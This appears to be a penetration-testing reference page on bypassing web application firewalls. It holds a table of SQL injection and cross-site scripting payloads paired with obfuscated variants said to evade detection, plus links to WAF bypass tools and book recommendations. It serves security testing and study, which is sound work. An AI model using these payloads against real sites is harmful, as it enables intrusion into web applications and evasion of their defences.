WAF Bypass

Blocked Attack	Undetected modification
'or 1=1 --	' or 2=2--
alert(0)	%00alert(0)
<script>alert(0)</script>	<script type=vbscript>MsgBox(0)</script>
' or ""='r	'/**/OR/**/""='
<script>alert(0)</script>	<img src="x:x" onerror="alert(0)"></img>
<img src=x:x onerror=alert(0)//></img>	<img src=http://url onload=alert(0)//></img>
1 or 1=1	(1)or(1)=(1)
eval(name)	x=this.name
eval(name)	X(0?$:name+1)

bypasswaf - Burp Extension

GitHub - codewatchorg/bypasswaf: Add headers to all Burp requests to bypass some WAF productsGitHub

nowafpls - Burp Extension

GitHub - assetnote/nowafpls: Burp Plugin to Bypass WAFs through the insertion of Junk DataGitHub

WAF Community Bypasses

GitHub - waf-bypass-maker/waf-community-bypassesGitHub

GitHub - 0xInfection/Awesome-WAF: 🔥 Web-application firewalls (WAFs) from security standpoint.GitHub

wafbypass app

Cookie Version

Bypassing WAFs with the phantom $Version cookiePortSwigger Research

Tools

GitHub - nemesida-waf/waf-bypass: Check your WAF before an attacker does this oneGitHub

WhatWaf

GitHub - Ekultek/WhatWaf: Detect and bypass web application firewalls and protection systemsGitHub

Resources

Payload obfuscation: Masking malicious scripts and bypassing defences

Interesting Books

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

• The Web Application Hacker’s Handbook The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more

• Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them

• Real-World Bug Hunting: A Field Guide to Web Hacking Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.

Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.